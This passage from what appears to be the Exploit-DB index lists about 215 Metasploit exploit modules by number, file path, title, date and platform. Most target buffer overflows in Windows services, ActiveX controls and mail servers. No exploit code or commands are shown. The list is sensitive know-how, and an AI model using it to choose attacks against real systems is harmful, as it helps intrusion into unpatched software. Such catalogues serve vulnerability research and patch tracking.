Overflow",2010-11-30,metasploit,windows,remote,0 -16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,metasploit,windows,remote,0 -16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,metasploit,hardware,remote,0 -16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow",2010-07-03,metasploit,hardware,remote,0 -16389,platforms/windows/remote/16389.rb,"Omni-NFS Server Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code Execution",2010-09-20,metasploit,windows,remote,0 -16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption",2011-01-24,metasploit,windows,remote,0 -16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server Resolution Overflow",2010-04-30,metasploit,windows,remote,0 -16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server Payload Execution via SQL injection",2011-02-08,metasploit,windows,remote,0 -16395,platforms/windows/remote/16395.rb,"Microsoft SQL Server Payload Execution",2010-12-21,metasploit,windows,remote,0 -16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0 -16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0 -16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0 -16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (1)",2010-05-09,metasploit,windows,remote,0 -16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0 -16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL Overflow",2010-04-30,metasploit,windows,remote,0 -16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent Overflow",2010-06-22,metasploit,windows,remote,0 -16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve Tape Engine Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service TCP Overflow",2010-04-30,metasploit,windows,remote,0 -16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (2)",2010-11-03,metasploit,windows,remote,0 -16410,platforms/windows/remote/16410.rb,"Computer Associates Alert Notification Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (3)",2010-11-03,metasploit,windows,remote,0 -16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow",2010-10-05,metasploit,windows,remote,0 -16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe Media Service Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",2010-11-03,metasploit,windows,remote,0 -16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,metasploit,windows,remote,0 -16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow",2010-11-04,metasploit,windows,remote,0 -16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (1)",2010-10-05,metasploit,windows,remote,0 -16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve Message Engine Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,metasploit,windows,remote,0 -16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 - PRIVMSG Handling Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16432,platforms/windows/remote/16432.rb,"Firebird Relational Database isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,metasploit,windows,remote,0 -16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16437,platforms/windows/remote/16437.rb,"Borland InterBase isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA Topology DELETEDEVICE Overflow",2010-09-20,metasploit,windows,remote,0 -16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow",2010-08-25,metasploit,windows,remote,0 -16440,platforms/windows/remote/16440.rb,"Firebird Relational Database isc_attach_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow SAMI Buffer Overflow",2010-10-05,metasploit,windows,remote,0 -16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit",2010-08-25,metasploit,windows,remote,0 -16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16445,platforms/windows/remote/16445.rb,"Bopup Communications Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (Windows)",2010-10-09,metasploit,windows,remote,0 -16447,platforms/windows/remote/16447.rb,"Borland InterBase isc_attach_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16448,platforms/windows/remote/16448.rb,"BakBone NetVault Remote Heap Overflow",2010-09-20,metasploit,windows,remote,0 -16449,platforms/windows/remote/16449.rb,"Borland InterBase SVC_attach() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",2010-07-03,metasploit,windows,remote,0 -16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",2010-09-20,metasploit,windows,remote,0 -16452,platforms/windows/remote/16452.rb,"AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,metasploit,windows,remote,0 -16453,platforms/windows/remote/16453.rb,"Borland Interbase Create-Request Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net Font Field Overflow",2010-06-15,metasploit,windows,remote,0 -16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,metasploit,windows,remote,0 -16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,metasploit,windows,remote,0 -16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,metasploit,win_x86,remote,0 -16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0 -16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0 -16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,metasploit,windows,remote,0 -16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0 -16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,metasploit,windows,remote,0 -16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,metasploit,windows,remote,0 -16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",2010-07-01,metasploit,windows,remote,0 -16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) Login Request Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,metasploit,windows,remote,0 -16478,platforms/windows/remote/16478.rb,"Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow",2010-09-20,metasploit,windows,remote,0 -16480,platforms/windows/remote/16480.rb,"MailEnable IMAPD W3C Logging Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow",2010-08-25,metasploit,windows,remote,0 -16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16483,platforms/windows/remote/16483.rb,"Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0 -16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0 -16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,metasploit,windows,remote,0 -16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,metasploit,windows,remote,0 -16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit",2011-01-22,metasploit,multiple,remote,0 -16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16497,platforms/windows/remote/16497.rb,"RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration",2010-09-20,metasploit,windows,remote,0 -16500,platforms/windows/remote/16500.rb,"Hyleos ChemView ActiveX Control Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 -16501,platforms/windows/remote/16501.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",2010-09-21,metasploit,windows,remote,0 -16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use After Free (1)",2010-04-30,metasploit,windows,local,0 -16504,platforms/windows/local/16504.rb,"Adobe util.printf() Buffer Overflow",2010-05-03,metasploit,windows,local,0 -16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow",2010-07-16,metasploit,windows,remote,0 -16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16508,platforms/windows/remote/16508.rb,"Novell iPrint Client ActiveX Control Buffer Overflow",2008-06-16,metasploit,windows,remote,0 -16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit",2011-02-22,metasploit,windows,remote,0 -16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager Stack Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16511,platforms/windows/remote/16511.rb,"Logitech VideoCall ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 -16513,platforms/windows/remote/16513.rb,"Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16514,platforms/windows/remote/16514.rb,"Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",2010-09-21,metasploit,windows,remote,0 -16515,platforms/windows/remote/16515.rb,"Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution",2010-05-26,metasploit,windows,remote,0 -16516,platforms/windows/remote/16516.rb,"Microsoft WMI Administration Tools ActiveX Buffer Overflow",2011-01-14,metasploit,windows,remote,0 -16517,platforms/windows/remote/16517.rb,"IBM Access Support ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16518,platforms/windows/remote/16518.rb,"Chilkat Crypt ActiveX WriteFile Unsafe Method",2010-09-20,metasploit,windows,remote,0 -16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow",2010-09-20,metasploit,windows,remote,0 -16521,platforms/windows/remote/16521.rb,"Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16523,platforms/windows/remote/16523.rb,"Novell iPrint Client ActiveX Control target-frame Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player SceneURL Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow",2010-07-03,metasploit,windows,remote,0 -16526,platforms/windows/remote/16526.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,metasploit,windows,remote,0 -16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",2010-05-04,metasploit,windows,remote,0 -16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16529,platforms/windows/remote/16529.rb,"WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,metasploit,windows,local,0 -16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,metasploit,windows,remote,0 -16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use After Free",2011-02-08,metasploit,windows,remote,0 -16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16536,platforms/windows/remote/16536.rb,"Green Dam URL Processing Buffer Overflow",2010-03-10,metasploit,windows,remote,0 -16537,platforms/windows/remote/16537.rb,"Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",2010-07-20,metasploit,windows,remote,0 -16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace ActiveX Control Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX Control Arbitrary File Download",2010-11-24,metasploit,windows,remote,0 -16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution",2010-09-28,metasploit,windows,remote,0 -16542,platforms/windows/webapps/16542.rb,"Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",2010-04-30,metasploit,windows,webapps,0 -16543,platforms/windows/remote/16543.rb,"Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail epi.dll AuthCredential Format String Exploit",2010-09-20,metasploit,windows,remote,0 -16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,metasploit,windows,remote,0 -16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,metasploit,windows,local,0 -16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,metasploit,windows,remote,0 -16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,metasploit,windows,remote,0 -16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow",2010-05-09,metasploit,windows,remote,0 -16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker",2010-09-24,metasploit,windows,remote,0 -16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption",2011-01-20,metasploit,windows,remote,0 -16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 -16553,platforms/windows/remote/16553.rb,"BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16554,platforms/windows/remote/16554.rb,"America Online ICQ ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 -16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption",2010-07-12,metasploit,windows,remote,0 -16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow",2010-05-09,metasploit,windows,local,0 -16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",2011-01-08,metasploit,windows,remote,0 -16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer ActiveX Control Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16560,platforms/windows/remote/16560.rb,"Autodesk IDrop ActiveX Control Heap Memory Corruption",2010-04-30,metasploit,windows,remote,0 -16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution",2010-09-20,metasploit,windows,remote,0 -16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 Playlist Buffer Overflow",2010-05-09,metasploit,windows,local,0 -16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow",2010-07-03,metasploit,windows,remote,0 -16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow",2010-07-26,metasploit,windows,remote,0 -16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption",2010-04-30,metasploit,windows,remote,0 -16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16569,platforms/windows/remote/16569.rb,"Orbit Downloader Connecting Log Creation Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",2010-09-20,metasploit,windows,remote,0 -16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16572,platforms/windows/remote/16572.rb,"GOM Player ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16573,platforms/windows/remote/16573.rb,"Macrovision InstallShield Update Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16574,platforms/windows/remote/16574.rb,"Microsoft Windows Shell LNK Code Execution",2010-09-21,metasploit,windows,remote,0 -16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16576,platforms/windows/remote/16576.rb,"Persits XUpload ActiveX AddFile Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution",2010-09-20,metasploit,windows,remote,0 -16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,metasploit,windows,remote,0 -16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption",2010-09-20,metasploit,windows,remote,0 -16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,metasploit,windows,remote,0 -16585,platforms/windows/remote/16585.rb,"Sun Java Web Start Plugin Command Line Argument Injection",2010-09-21,metasploit,windows,remote,0 -16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer SMIL Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16587,platforms/windows/remote/16587.rb,"Sun Java Runtime New Plugin docbase Buffer Overflow",2011-01-08,metasploit,windows,remote,0 -16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",2011-01-08,metasploit,windows,local,0 -16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use After Free",2010-12-14,metasploit,windows,remote,0 -16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0 -16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0 -16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0 -16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - VML Fill Method Code Execution",2010-07-03,metasploit,windows,remote,0 -16598,platforms/windows/remote/16598.rb,"Persits XUpload ActiveX MakeHttpRequest Directory Traversal",2010-11-11,metasploit,windows,remote,0 